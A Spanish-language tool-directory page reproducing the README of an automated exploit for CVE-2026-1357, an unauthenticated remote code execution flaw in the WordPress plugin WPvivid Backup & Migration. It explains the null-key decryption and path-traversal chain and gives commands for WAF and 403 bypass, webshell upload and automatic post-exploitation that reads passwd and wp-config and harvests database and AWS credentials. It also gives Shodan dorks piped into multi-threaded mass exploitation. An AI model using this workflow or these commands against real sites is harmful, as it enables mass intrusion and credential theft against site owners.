Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1357-POC — Herramienta de explotación automatizada para CVE-2026-1357, una RCE no autenticada en WPvivid Backup & Migration. Escanea objetivos WordPress, evita WAF/403, sube una shell mediante path traversal y ejecuta reconocimiento post-explotación con generación de informes. | Kitploit
Herramientas/GitHubGitHub/cybertechajju/cve-2026-1357-poc
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónEvasión de WAFPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

Herramienta de explotación automatizada para CVE-2026-1357, una RCE no autenticada en WPvivid Backup & Migration. Escanea objetivos WordPress, evita WAF/403, sube una shell mediante path traversal y ejecuta reconocimiento post-explotación con generación de informes.

Ver Repositorio
9113hace 7 mesesAún no revisado
Compartir

CVE-2026-1357 — WPvivid Backup & Migration RCE

Crédito CVE: Lucas Montes (NiRoX)
Herramienta por: CyberTechAjju
CVSS: 9.8 (Crítico) | Afecta: ≤ 0.9.123 | Parcheado: 0.9.124


⚠️ Aviso Legal

Solo para pruebas de seguridad autorizadas. El acceso no autorizado a sistemas es ilegal.


Resumen

RCE sin autenticación en WPvivid Backup & Migration mediante dos fallos encadenados:

  1. Criptografía Fail-Open — openssl_private_decrypt() devuelve false con una clave incorrecta → phpseclib v1 lo trata como clave AES de bytes nulos → el atacante cifra con 16 bytes nulos
  2. Path Traversal — campo name sin sanitizar → ../uploads/shell.php escapa del directorio de respaldo

Restricción: Explotable solo cuando wpvivid_api_token está generado y no ha expirado.


Características


Instalación

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

Uso

root@kitploit:~
# Solo escaneo (detectar WordPress + WPvivid + versión)
python3 cve_2026_1357.py -u http://target.com

# Escaneo + Explotación + Post-Explotación automática
python3 cve_2026_1357.py -u http://target.com --exploit

# Explotación sin reconocimiento post-explotación
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# Escaneo masivo con informe
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# A través del proxy de Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# Modo solo payload
python3 cve_2026_1357.py -u http://x --payload-only

Todas las Opciones

root@kitploit:~
-u, --url         URL de objetivo único
-l, --list        Archivo con URLs (una por línea)
--exploit         Habilitar modo de explotación
--shell NAME      Nombre del archivo shell (por defecto: pwn_remote.php)
--no-post         Omitir reconocimiento post-explotación
--report          Generar informe PoC en Markdown
--report-dir DIR  Directorio de salida del informe
-t, --threads N   Hilos concurrentes (por defecto: 5)
--timeout SECS    Tiempo de espera de solicitud (por defecto: 10)
--proxy URL       Proxy HTTP para Burp
--payload-only    Imprimir payload en base64 y salir
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

Descubrimiento de Objetivos (Dorks)

Consulta dorks.md para la lista completa. Rápidos:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

Archivos

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← Herramienta principal (escáner + explotador + post-explotación)
├── dorks.md            ← Dorks de Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt    ← Dependencias de Python
├── .gitignore
└── README.md           ← Este archivo

Créditos

Lucas Montes (NiRoX) — Descubrimiento del CVE
CyberTechAjju — Herramienta de explotación

Descargar herramienta
CaracterísticaDescripción
🔍 Detección AutomáticaFingerprinting de WordPress + plugin WPvivid + versión
🛡️ Bypass de WAFRotación de User-Agent, suplantación de cabeceras, trucos de codificación
🔓 Bypass de 403X-Forwarded-For, X-Original-URL, normalización de rutas, doble codificación
💀 Auto-ExplotaciónPayload AES de clave nula + subida por path traversal
📋 Post-ExplotaciónEjecuta automáticamente 20+ comandos de reconocimiento (id, whoami, passwd, wp-config, SUID, etc.)
🔑 Extractor de DatosBusca credenciales de BD, claves API, contraseñas, claves AWS en la salida
📊 Generación de InformesInforme PoC en Markdown con evidencia completa de explotación
⚡ Escaneo MasivoMultihilo con soporte de proxy/Burp